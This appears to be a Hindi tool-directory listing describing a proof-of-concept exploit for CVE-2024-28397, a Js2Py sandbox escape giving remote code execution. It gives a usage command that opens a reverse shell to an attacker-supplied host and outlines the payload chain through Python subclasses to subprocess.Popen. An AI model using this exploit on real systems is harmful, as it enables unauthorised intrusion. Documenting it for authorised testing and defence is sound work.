Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-28397-Js2Py-RCE — इस रिपॉजिटरी में CVE-2024-28397 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है, जो js2py लाइब्रेरी में एक कमजोरी है जो सैंडबॉक्स एस्केप के माध्यम से रिमोट कोड एक्जीक्यूशन प्राप्त करने की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/d3ltaformation/cve-2024-28397-js2py-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubd3ltaformation/cve-2024-28397-js2py-rce

CVE-2024-28397-Js2Py-RCE

इस रिपॉजिटरी में CVE-2024-28397 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है, जो js2py लाइब्रेरी में एक कमजोरी है जो सैंडबॉक्स एस्केप के माध्यम से रिमोट कोड एक्जीक्यूशन प्राप्त करने की अनुमति देती है।

रिपॉजिटरी देखें
91 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-28397-Js2Py-RCE

विवरण

यह रिपॉजिटरी CVE-2024-28397 के लिए एक Python-आधारित प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल करता है, जो Python के लिए Js2Py JavaScript इंटरप्रेटर में एक सैंडबॉक्स एस्केप भेद्यता है। जब लक्ष्य एप्लिकेशन Js2Py के माध्यम से अविश्वसनीय JS कोड का मूल्यांकन करता है, तो एक हमलावर सैंडबॉक्स से बाहर निकल सकता है और मनमाना Python कोड निष्पादित कर सकता है। इसका उपयोग भेद्य सिस्टम पर रिमोट कोड एक्सीक्यूशन (RCE) और एक रिवर्स शेल प्राप्त करने के लिए किया जा सकता है।

यह एक्सप्लॉइट Marven11 के CVE-2024-28397-js2py-Sandbox-Escape प्रोजेक्ट से प्रेरित था।


अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक और अधिकृत पेनिट्रेशन टेस्टिंग उद्देश्यों के लिए प्रदान की गई है। इस स्क्रिप्ट का अनधिकृत उपयोग उन सिस्टमों के विरुद्ध जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है। लेखक इस स्क्रिप्ट के दुरुपयोग या इसके कारण हुई क्षति के लिए कोई जिम्मेदारी नहीं लेता है।


भेद्यता के बारे में

  • CVE ID: CVE-2024-28397
  • घटक: Js2Py सैंडबॉक्स एस्केप
  • प्रभाव: __class__.__base__.__subclasses__ के माध्यम से Python के ऑब्जेक्ट मॉडल तक अप्रतिबंधित पहुंच, जिससे मनमाना कोड निष्पादन होता है
  • आक्रमण वेक्टर: रिमोट (उपयोगकर्ता-नियंत्रित JavaScript का मूल्यांकन करने वाले एक्सपोज़्ड HTTP इंटरफ़ेस के माध्यम से)

विशेषताएँ

  • Python RCE के माध्यम से स्वचालित रिवर्स शेल पेलोड वितरण
  • इनलाइन Base64-एन्कोडेड शेल कमांड निष्पादन
  • बुनियादी PTY स्थिरीकरण के साथ अंतर्निहित रिवर्स शेल लिसनर
  • स्वच्छ आउटपुट फ़ॉर्मेटिंग
  • हल्का और निर्भरता-मुक्त (requests को छोड़कर)

आवश्यकताएँ

  • Python 3.x
  • requests मॉड्यूल (pip install requests)
  • एक Linux सिस्टम (/dev/tcp रिवर्स शेल के लिए)
  • Js2Py के एक भेद्य कार्यान्वयन को चलाने वाला एक लक्ष्य

उपयोग

python3 exploit.py --target http://example.htb --lhost 10.10.14.51 --lport 4444
  • --target: भेद्य वेब ऐप एंडपॉइंट का पूरा URL
  • --lhost: आपका स्थानीय IP पता (रिवर्स शेल के लिए उपयोग किया जाता है)
  • --lport: शेल प्राप्त करने के लिए आपका स्थानीय पोर्ट

यह कैसे काम करता है

  1. स्क्रिप्ट एक Bash रिवर्स शेल तैयार करती है, इसे Base64-एन्कोड करती है, और इसे JavaScript पेलोड में इंजेक्ट करती है।
  2. JS पेलोड __class__.__base__.__subclasses__() का उपयोग करके Python ऑब्जेक्ट ट्री को चलता है ताकि subprocess.Popen ढूंढ सके।
  3. यह शेल को डीकोड और निष्पादित करने के लिए Popen का उपयोग करता है।
  4. हमलावर की मशीन रिवर्स शेल प्राप्त करती है और स्वचालित रूप से इसे स्थिर करती है।
टूल डाउनलोड करें